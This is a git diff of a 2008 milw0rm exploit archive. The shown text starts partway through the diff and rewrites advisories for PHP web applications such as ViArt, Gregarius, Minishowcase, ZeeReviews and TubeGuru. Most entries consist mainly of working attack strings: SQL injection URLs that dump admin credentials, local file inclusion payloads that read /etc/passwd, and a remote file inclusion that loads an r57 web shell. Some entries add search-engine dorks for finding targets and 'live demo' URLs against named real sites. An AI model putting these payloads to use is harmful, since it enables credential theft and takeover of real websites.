- -/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /* - -A url like the one above will successfully grab the admin info -from the database, and then attempt to use the admin data in a -query, where it will then error. Still, the admin credentials -will be displayed in the SQL Error as part of the faulty query -and visible to the attacker. It is also worth mentioning that -ViArt stores all credentials in plain text, so once an attacker -has the credentials he is guaranteed access to the application. - - - -Solution: -The ViArt developers have released a patch for the vulnerable -ViArt 3.5. Users are encouraged t upgrade as soon as possible. - - - -Credits: -James Bercegay of the GulfTech Security Research Team - - - -Related Info: -The original advisory can be found at the following location -http://www.gulftech.org/?node=research&article_id=00118-07292008 - -# milw0rm.com [2008-07-28] +########################################################## +# GulfTech Security Research July 28, 2008 +########################################################## +# Vendor : ViArt, Ltd +# URL : http://www.viart.com/ +# Version : ViArt Shop <= 3.5 +# Risk : SQL Injection +########################################################## + + +Description: +ViArt Shop is a full featured online ecommerce solution written +in php. There is a high risk SQL Injection in ViArt that allows +for an attacker to take over the ViArt installation. This +vulnerability is present regardless of magic_quotes configuration. +An updated version of ViArt has been released and all users are +encouraged to upgrade their ViArt installation as soon as possible. + + +SQL Injection: +There is a high risk SQL Injection vulnerability in ViArt that +allows for an attacker to run arbitrary queries via a malicious +request. The vulnerable code can be found in "products_rss.php". 
+As seen below the "$category_id" variable is never sanitized within +the query, and is never sanitized prior to that point either. + +if ($category_id == 0){ + $sql = "SELECT category_id, friendly_url FROM " . $table_prefix . "categories WHERE category_path like '%".$category_id.",%' AND is_showing = 1 "; +} else { + $sql = "SELECT category_id, friendly_url FROM " . $table_prefix . "categories WHERE category_path like '%,".$category_id.",%' AND is_showing = 1 "; +} + +This allows for an attacker to easily select arbitrary data +from the database such as usernames,passwords, and even credit +card information. it should also be noted that ViArt strips +slashes from within the get_param() function, so magic_quotes +does not prevent this SQL Injection from happening. + +/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /* + +A url like the one above will successfully grab the admin info +from the database, and then attempt to use the admin data in a +query, where it will then error. Still, the admin credentials +will be displayed in the SQL Error as part of the faulty query +and visible to the attacker. It is also worth mentioning that +ViArt stores all credentials in plain text, so once an attacker +has the credentials he is guaranteed access to the application. + + + +Solution: +The ViArt developers have released a patch for the vulnerable +ViArt 3.5. Users are encouraged t upgrade as soon as possible. + + + +Credits: +James Bercegay of the GulfTech Security Research Team + + + +Related Info: +The original advisory can be found at the following location +http://www.gulftech.org/?node=research&article_id=00118-07292008 + +# milw0rm.com [2008-07-28] diff --git a/platforms/php/webapps/6156.txt b/platforms/php/webapps/6156.txt index 951875477..a3d3f13c2 100755 --- a/platforms/php/webapps/6156.txt +++ b/platforms/php/webapps/6156.txt 
@@ -1,68 +1,68 @@
-Digital Security Research Group [DSecRG] Advisory #DSECRG-08-034
-
-
-Application: Minishowcase Image Gallery
-Versions Affected: v09b136
-Vendor URL: http://minishowcase.frwrd.net
-Bug: Local File Include
-Exploits: YES
-Reported: 14.07.2008
-Second report: 22.07.2008
-Vendor response: NONE
-Solution: NONE
-Date of Public Advisory: 29.07.2008
-Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
-
-
-
-Description
-***********
-
-Minishowcase Image Gallery has local file include vulnerability in script libraries/general.init.php
-
-Vulnerable GET parameters "lang".
-
-Successful exploitation requires that "register_globals" is enabled.
-
-Code
-****
-#################################################
-
-...
- $_dir_file = dirname(dirname(__FILE__));
- $_dir_path = dirname($_SERVER["DOCUMENT_ROOT"] . $_SERVER['PHP_SELF']);
-
- if ($_dir_file != $_dir_path) {
- if (!isset($settings['minishowcase_url'])
- || ($settings['minishowcase_url'] == "")) {
- die ("

    ALERT: if you are including minishowcase with PHP into a website, please set the \$minishowcase_url variable in the /config/settings.php file

    ");
- }
- }
-...
- if (isset($_GET["lang"])) $set_language = $_GET["lang"];
- $langfile = ROOT.'languages/'.$set_language.'.php';
- require_once($langfile);
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRG&lang=../../../../../../../../../../../../../etc/passwd%00
-
-
-Solution
-********
-
-No response or any updates from vendor.
-
-
-About
-*****
-
-Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
-
-
-Contact: research [at] dsec [dot] ru
- http://www.dsec.ru (in Russian)
-
-# milw0rm.com [2008-07-29]
+Digital Security Research Group [DSecRG] Advisory #DSECRG-08-034
+
+
+Application: Minishowcase Image Gallery
+Versions Affected: v09b136
+Vendor URL: http://minishowcase.frwrd.net
+Bug: Local File Include
+Exploits: YES
+Reported: 14.07.2008
+Second report: 22.07.2008
+Vendor response: NONE
+Solution: NONE
+Date of Public Advisory: 29.07.2008
+Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
+
+
+
+Description
+***********
+
+Minishowcase Image Gallery has local file include vulnerability in script libraries/general.init.php
+
+Vulnerable GET parameters "lang".
+
+Successful exploitation requires that "register_globals" is enabled.
+
+Code
+****
+#################################################
+
+...
+ $_dir_file = dirname(dirname(__FILE__));
+ $_dir_path = dirname($_SERVER["DOCUMENT_ROOT"] . $_SERVER['PHP_SELF']);
+
+ if ($_dir_file != $_dir_path) {
+ if (!isset($settings['minishowcase_url'])
+ || ($settings['minishowcase_url'] == "")) {
+ die ("

    ALERT: if you are including minishowcase with PHP into a website, please set the \$minishowcase_url variable in the /config/settings.php file

    ");
+ }
+ }
+...
+ if (isset($_GET["lang"])) $set_language = $_GET["lang"];
+ $langfile = ROOT.'languages/'.$set_language.'.php';
+ require_once($langfile);
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRG&lang=../../../../../../../../../../../../../etc/passwd%00
+
+
+Solution
+********
+
+No response or any updates from vendor.
+
+
+About
+*****
+
+Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
+
+
+Contact: research [at] dsec [dot] ru
+ http://www.dsec.ru (in Russian)
+
+# milw0rm.com [2008-07-29]
diff --git a/platforms/php/webapps/6159.txt b/platforms/php/webapps/6159.txt
index e6077b65f..88eaeb0ad 100755
--- a/platforms/php/webapps/6159.txt
+++ b/platforms/php/webapps/6159.txt
@@ -1,70 +1,70 @@
-##########################################################
-# GulfTech Security Research July 29, 2008
-##########################################################
-# Vendor : Marco Bonetti
-# URL : http://www.gregarius.net/
-# Version : Gregarius <= 0.5.4
-# Risk : SQL Injection
-##########################################################
-
-
-Description:
-Gregarius is a popular web-based RSS/RDF/ATOM feed aggregator
-written in php. There are some SQL Injection issues in Gregarius
-that allow for the disclosure of database contents and ultimately
-the complete compromise of the Gregarius installation via exposed
-admin credentials. It is advised that Gregarius users update their
-gregarius installations as soon as possible.
-
-
-
-SQL Injection:
-Gregarius contains a number of SQL Injection issues that allow for
-an attacker to expose admin credentials with no kind of authentication
-needed. Lets have a look at the following code taken from /ajax.php
-
-
-function __exp__getFeedContent($cid) {
- ob_start();
- rss_require('cls/items.php');
-
- $readItems = new ItemList();
-
- $readItems -> populate(" not(i.unread & ". RSS_MODE_UNREAD_STATE .")
- and i.cid= $cid", "", 0, 2, ITEM_SORT_HINT_READ);
- $readItems -> setTitle(LBL_H2_RECENT_ITEMS);
- $readItems -> setRenderOptions(IL_TITLE_NO_ESCAPE);
- foreach ($readItems -> feeds[0] -> items as $item) {
- $item -> render();
- }
- $c = ob_get_contents();
-
- ob_end_clean();
- return "$cid|@|$c";
-}
-
-
-The above function is called by sajax_handle_client_request() and
-allows for an attacker to specify the content of $cid via the rsargs[]
-array. This being the case an attacker is able to influence the query
-regardless of magic_quotes_gps settings etc.
-
-/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99 UNION SELECT concat(
-char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/*
-
-The above query would successfully dump the users table to the browser.
-The password hashes in the database are md5 encrypted, but an attacker
-only need to md5 encrypt that password hash and place it in a cookie with the format of user|hash to gain access to the administrative controls.
-
-
-
-Solution:
-The Gregarius developers have been made aware of this issue, and users
-are encouraged to upgrade as soon as possible.
-
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-# milw0rm.com [2008-07-29]
+##########################################################
+# GulfTech Security Research July 29, 2008
+##########################################################
+# Vendor : Marco Bonetti
+# URL : http://www.gregarius.net/
+# Version : Gregarius <= 0.5.4
+# Risk : SQL Injection
+##########################################################
+
+
+Description:
+Gregarius is a popular web-based RSS/RDF/ATOM feed aggregator
+written in php. There are some SQL Injection issues in Gregarius
+that allow for the disclosure of database contents and ultimately
+the complete compromise of the Gregarius installation via exposed
+admin credentials. It is advised that Gregarius users update their
+gregarius installations as soon as possible.
+
+
+
+SQL Injection:
+Gregarius contains a number of SQL Injection issues that allow for
+an attacker to expose admin credentials with no kind of authentication
+needed. Lets have a look at the following code taken from /ajax.php
+
+
+function __exp__getFeedContent($cid) {
+ ob_start();
+ rss_require('cls/items.php');
+
+ $readItems = new ItemList();
+
+ $readItems -> populate(" not(i.unread & ". RSS_MODE_UNREAD_STATE .")
+ and i.cid= $cid", "", 0, 2, ITEM_SORT_HINT_READ);
+ $readItems -> setTitle(LBL_H2_RECENT_ITEMS);
+ $readItems -> setRenderOptions(IL_TITLE_NO_ESCAPE);
+ foreach ($readItems -> feeds[0] -> items as $item) {
+ $item -> render();
+ }
+ $c = ob_get_contents();
+
+ ob_end_clean();
+ return "$cid|@|$c";
+}
+
+
+The above function is called by sajax_handle_client_request() and
+allows for an attacker to specify the content of $cid via the rsargs[]
+array. This being the case an attacker is able to influence the query
+regardless of magic_quotes_gps settings etc.
+
+/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99 UNION SELECT concat(
+char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/*
+
+The above query would successfully dump the users table to the browser.
+The password hashes in the database are md5 encrypted, but an attacker
+only need to md5 encrypt that password hash and place it in a cookie with the format of user|hash to gain access to the administrative controls.
+
+
+
+Solution:
+The Gregarius developers have been made aware of this issue, and users
+are encouraged to upgrade as soon as possible.
+
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+# milw0rm.com [2008-07-29]
diff --git a/platforms/php/webapps/6160.txt b/platforms/php/webapps/6160.txt
index df32748c7..583a5073c 100755
--- a/platforms/php/webapps/6160.txt
+++ b/platforms/php/webapps/6160.txt
@@ -1,14 +1,14 @@
-# Name Of Script : PHP Hosting Directory 2.0
-# Download From : http://jnshosts.com/download/phphost_directory.zip
-# Found By : RoMaNcYxHaCkEr
-# My Homepage : WwW.4RxH.CoM
-# My Group : [RoMaNTiC-TeaM]
-# Type Of Exploit : RFI
-# P.O.C. : http://WwW.4RxH.CoM/phphost_directoryv2/include/admin.php?rd=http://site.com/r57.txt?
-# Good Luck
-# Note : If You Lamerz , Kidz Or Snitch Just I Said For You (Fuck You)
-# Contact Me : RxH0@HoTMaiL.CoM
-# rXh
-# bEST wISHES
-
-# milw0rm.com [2008-07-29]
+# Name Of Script : PHP Hosting Directory 2.0
+# Download From : http://jnshosts.com/download/phphost_directory.zip
+# Found By : RoMaNcYxHaCkEr
+# My Homepage : WwW.4RxH.CoM
+# My Group : [RoMaNTiC-TeaM]
+# Type Of Exploit : RFI
+# P.O.C. : http://WwW.4RxH.CoM/phphost_directoryv2/include/admin.php?rd=http://site.com/r57.txt?
+# Good Luck
+# Note : If You Lamerz , Kidz Or Snitch Just I Said For You (Fuck You)
+# Contact Me : RxH0@HoTMaiL.CoM
+# rXh
+# bEST wISHES
+
+# milw0rm.com [2008-07-29]
diff --git a/platforms/php/webapps/6161.txt b/platforms/php/webapps/6161.txt
index dd79d27f4..73e7875d4 100755
--- a/platforms/php/webapps/6161.txt
+++ b/platforms/php/webapps/6161.txt
@@ -1,23 +1,23 @@
-####################################################################################################
- HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
- Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
-####################################################################################################
-[~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,|
-[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
-[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
-[~] Name Script : HIOX Random Ad 1.3
-[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip
-#############################[ I love the Messenger of Allah Mohammad ]#############################
-[~] Error (hioxRandomAd.php) :
-include "$hm/admin/props.php";
-[~] Exploit :
-http://xxxx.com/[path]/hioxRandomAd.php?hm=Evil_Code
-#############################[ I love the Messenger of Allah Mohammad ]#############################
-[~] Greetz :
-Mr.SaFa7 & Night Mare & Root Hacker & Dmar al3noOoz ,
-All Members Real Hack & Members Arabs Security And All My Friends ,
-####################################################################################################
- Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
-####################################################################################################
-
-# milw0rm.com [2008-07-30]
+####################################################################################################
+ HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
+ Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
+####################################################################################################
+[~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,|
+[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
+[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
+[~] Name Script : HIOX Random Ad 1.3
+[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip
+#############################[ I love the Messenger of Allah Mohammad ]#############################
+[~] Error (hioxRandomAd.php) :
+include "$hm/admin/props.php";
+[~] Exploit :
+http://xxxx.com/[path]/hioxRandomAd.php?hm=Evil_Code
+#############################[ I love the Messenger of Allah Mohammad ]#############################
+[~] Greetz :
+Mr.SaFa7 & Night Mare & Root Hacker & Dmar al3noOoz ,
+All Members Real Hack & Members Arabs Security And All My Friends ,
+####################################################################################################
+ Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
+####################################################################################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6162.txt b/platforms/php/webapps/6162.txt
index 31c02db8d..8044c5d02 100755
--- a/platforms/php/webapps/6162.txt
+++ b/platforms/php/webapps/6162.txt
@@ -1,24 +1,24 @@
-####################################################################################################
- HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability
- Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
-####################################################################################################
-[~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,|
-[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
-[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
-[~] Name Script : HIOX Browser Statistics 2.0
-[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
-#############################[ I love the Messenger of Allah Mohammad ]#############################
-[~] Error (hioxupdate.php + hioxstats.php) :
-include "$hm/browser.php";
-[~] Exploit :
-http://xxxx.com/[path]/hioxupdate.php?hm=Evil_Code
-http://xxxx.com/[path]/hioxstats.php?hm=Evil_Code
-#############################[ I love the Messenger of Allah Mohammad ]#############################
-[~] Greetz :
-Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz ,
-All Members Real Hack & Members Arabs Security And All My Friends ,
-####################################################################################################
- Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
-####################################################################################################
-
-# milw0rm.com [2008-07-30]
+####################################################################################################
+ HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability
+ Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
+####################################################################################################
+[~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,|
+[~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( |
+[~] My Email : Ghost-r00t@Hotmail.com |/ /\ \|
+[~] Name Script : HIOX Browser Statistics 2.0
+[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
+#############################[ I love the Messenger of Allah Mohammad ]#############################
+[~] Error (hioxupdate.php + hioxstats.php) :
+include "$hm/browser.php";
+[~] Exploit :
+http://xxxx.com/[path]/hioxupdate.php?hm=Evil_Code
+http://xxxx.com/[path]/hioxstats.php?hm=Evil_Code
+#############################[ I love the Messenger of Allah Mohammad ]#############################
+[~] Greetz :
+Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz ,
+All Members Real Hack & Members Arabs Security And All My Friends ,
+####################################################################################################
+ Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :)
+####################################################################################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6164.txt b/platforms/php/webapps/6164.txt
index 32bcb8c07..eb0e3c360 100755
--- a/platforms/php/webapps/6164.txt
+++ b/platforms/php/webapps/6164.txt
@@ -1,24 +1,24 @@
-#####################################################################################
-#### nzFotolog v0.4.1 (Lfi) ####
-#####################################################################################
-# #
-#AUTHOR : IRCRASH (R3d.W0rm) #
-#Discovered by : IRCRASH (R3d.W0rm) #
-#Our Site : Http://IRCRASH.COM #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm #
-#####################################################################################
-# #
-#Script Download : www.nazgulled.net #
-# #
-#DORK : "Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral" #
-# #
-#####################################################################################
-# [Lfi] #
-# #
-#http://Example/index.php?action_file=file.type%00 #
-# #
-#####################################################################################
-# Site : Http://IRCRASH.COM #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-07-30]
+#####################################################################################
+#### nzFotolog v0.4.1 (Lfi) ####
+#####################################################################################
+# #
+#AUTHOR : IRCRASH (R3d.W0rm) #
+#Discovered by : IRCRASH (R3d.W0rm) #
+#Our Site : Http://IRCRASH.COM #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm #
+#####################################################################################
+# #
+#Script Download : www.nazgulled.net #
+# #
+#DORK : "Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral" #
+# #
+#####################################################################################
+# [Lfi] #
+# #
+#http://Example/index.php?action_file=file.type%00 #
+# #
+#####################################################################################
+# Site : Http://IRCRASH.COM #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6165.txt b/platforms/php/webapps/6165.txt
index 33ad6e0ef..6f0f2b96b 100755
--- a/platforms/php/webapps/6165.txt
+++ b/platforms/php/webapps/6165.txt
@@ -1,39 +1,39 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL Injection Vulnerability
-##
-## ZeeReviews ( comments.php ItemID )
-##
-## http://www.zeescripts.com
-##
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM
-##
-## Email : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-##
-## -[[: Exploite :]]-
-##
-## www.Target.com/comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users--
-##
-########################
-########################
-
-#######################################################################################################
-#######################################################################################################
- -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-30]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL Injection Vulnerability
+##
+## ZeeReviews ( comments.php ItemID )
+##
+## http://www.zeescripts.com
+##
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM
+##
+## Email : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+##
+## -[[: Exploite :]]-
+##
+## www.Target.com/comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users--
+##
+########################
+########################
+
+#######################################################################################################
+#######################################################################################################
+ -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6166.php b/platforms/php/webapps/6166.php
index 0f0f60b8e..7c03bfc1d 100755
--- a/platforms/php/webapps/6166.php
+++ b/platforms/php/webapps/6166.php
@@ -1,68 +1,68 @@ - -
    -"); - fclose($file); - $creat = "false"; - echo "
    New User Created - -
    Please Wait You will be Redirected to Login Page -
    "; - } - else{ - echo "
    Enter correct Username or Password
    "; - } -} -if($creat == "true"){ -?> - - -
    - Create New User
    -
    > - - - - - -
    User Name -
    Password
    -
    -
    -User Already Exist"; -} -?> -
    - -# milw0rm.com [2008-07-30] + +
    +"); + fclose($file); + $creat = "false"; + echo "
    New User Created + +
    Please Wait You will be Redirected to Login Page +
    "; + } + else{ + echo "
    Enter correct Username or Password
    "; + } +} +if($creat == "true"){ +?> + + +
    + Create New User
    +
    > + + + + + +
    User Name +
    Password
    +
    +
    +User Already Exist"; +} +?> +
    +
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6167.txt b/platforms/php/webapps/6167.txt
index 8182634d1..b532d2bf8 100755
--- a/platforms/php/webapps/6167.txt
+++ b/platforms/php/webapps/6167.txt
@@ -1,43 +1,43 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL Injection Vulnerability
-##
-## Article Friendly Pro ( categorydetail.php Cat )
-##
-## Article Friendly Standard ( authordetail.php autid )
-##
-## http://www.articlefriendly.com/
-##
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM
-##
-## Email : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-##
-## -[[: Exploites :]]-
-##
-## [[ Article Friendly Pro ]] www.Target.com/authordetail.php?autid=-1'+union+select+0,0,0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
-##
-## [[ Article Friendly Standard ]] www.Target.com/categorydetail.php?Cat=1'+and+1=0+union+select+0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0/*
-##
-########################
-########################
-
-#######################################################################################################
-#######################################################################################################
- -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-30]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL Injection Vulnerability
+##
+## Article Friendly Pro ( categorydetail.php Cat )
+##
+## Article Friendly Standard ( authordetail.php autid )
+##
+## http://www.articlefriendly.com/
+##
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM
+##
+## Email : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+##
+## -[[: Exploites :]]-
+##
+## [[ Article Friendly Pro ]] www.Target.com/authordetail.php?autid=-1'+union+select+0,0,0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
+##
+## [[ Article Friendly Standard ]] www.Target.com/categorydetail.php?Cat=1'+and+1=0+union+select+0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0/*
+##
+########################
+########################
+
+#######################################################################################################
+#######################################################################################################
+ -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6168.php b/platforms/php/webapps/6168.php
index 6734e309e..a6989bcc7 100755
--- a/platforms/php/webapps/6168.php
+++ b/platforms/php/webapps/6168.php
@@ -1,68 +1,68 @@ - -
    -"); - fclose($file); - $creat = "false"; - echo "
    New User Created - -
    Please Wait You will be Redirected to Login Page -
    "; - } - else{ - echo "
    Enter correct Username or Password
    "; - } -} -if($creat == "true"){ -?> - - -
    - Create New User
    -
    > - - - - - -
    User Name -
    Password
    -
    -
    -User Already Exist"; -} -?> -
    - -# milw0rm.com [2008-07-30] + +
    +"); + fclose($file); + $creat = "false"; + echo "
    New User Created + +
    Please Wait You will be Redirected to Login Page +
    "; + } + else{ + echo "
    Enter correct Username or Password
    "; + } +} +if($creat == "true"){ +?> + + +
    + Create New User
    +
    > + + + + + +
    User Name +
    Password
    +
    +
    +User Already Exist"; +} +?> +
    +
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6169.txt b/platforms/php/webapps/6169.txt
index d544a3528..f3d400b51 100755
--- a/platforms/php/webapps/6169.txt
+++ b/platforms/php/webapps/6169.txt
@@ -1,64 +1,64 @@
-|___________________________________________________|
-|
-| Classified Ads (cid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-| Author: Hussin X
-|
-| Home : www.tryag.cc/cc
-|
-| email: darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-| |
-|
-| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=5
-|
-| DorK : inurl:browsecats.php?cid=
-|___________________________________________________|
-
-
-
-
-
-
-Exploit:
-
-www.[target].com/Script/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
-
-
-
-
-L!VE DEMO:
-
-
-http://www.bbx.com/bbxca/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
-
-________________________
-table_name : column_name
-
-bbxbzauctions_admin:admin_name
-bbxbzauctions_admin:pwd
-freetplbanners_admin:admin_name
-freetplbanners_admin:pwd
-
-________________________
-
-
-
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
-|
-| Iraqihack | FAHD | mos_chori | Silic0n
-|
-|_________________________________________________________________
-
-
- Im IRAQi
-
-# milw0rm.com [2008-07-30]
+|___________________________________________________|
+|
+| Classified Ads (cid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+| Author: Hussin X
+|
+| Home : www.tryag.cc/cc
+|
+| email: darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+| |
+|
+| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=5
+|
+| DorK : inurl:browsecats.php?cid=
+|___________________________________________________|
+
+
+
+
+
+
+Exploit:
+
+www.[target].com/Script/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
+
+
+
+
+L!VE DEMO:
+
+
+http://www.bbx.com/bbxca/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--
+
+________________________
+table_name : column_name
+
+bbxbzauctions_admin:admin_name
+bbxbzauctions_admin:pwd
+freetplbanners_admin:admin_name
+freetplbanners_admin:pwd
+
+________________________
+
+
+
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
+|
+| Iraqihack | FAHD | mos_chori | Silic0n
+|
+|_________________________________________________________________
+
+
+ Im IRAQi
+
+# milw0rm.com [2008-07-30]
diff --git a/platforms/php/webapps/6170.txt b/platforms/php/webapps/6170.txt
index 78a3128b4..46056d34f 100755
--- a/platforms/php/webapps/6170.txt
+++ b/platforms/php/webapps/6170.txt
@@ -1,55 +1,55 @@ -|___________________________________________________| -| -| TubeGuru (ugroups php UID) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| -| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=3 -| -| DorK : inurl:ugroups.php?UID= -| -|___________________________________________________| - - - -Exploit: - -www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup-- - - - -L!VE DEMO: : - - -http://www.tubeguru.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup-- - - - -admin login : - -www.[target].com/Script/admin2/siteadmin/index.php - -____________________________( Greetz )____________________________ -| -| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke -| -| Iraqihack | FAHD | mos_chori | Silic0n -| -|_________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-07-30] +|___________________________________________________| +| +| TubeGuru (ugroups php UID) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.tryag.cc/cc +| +| email: 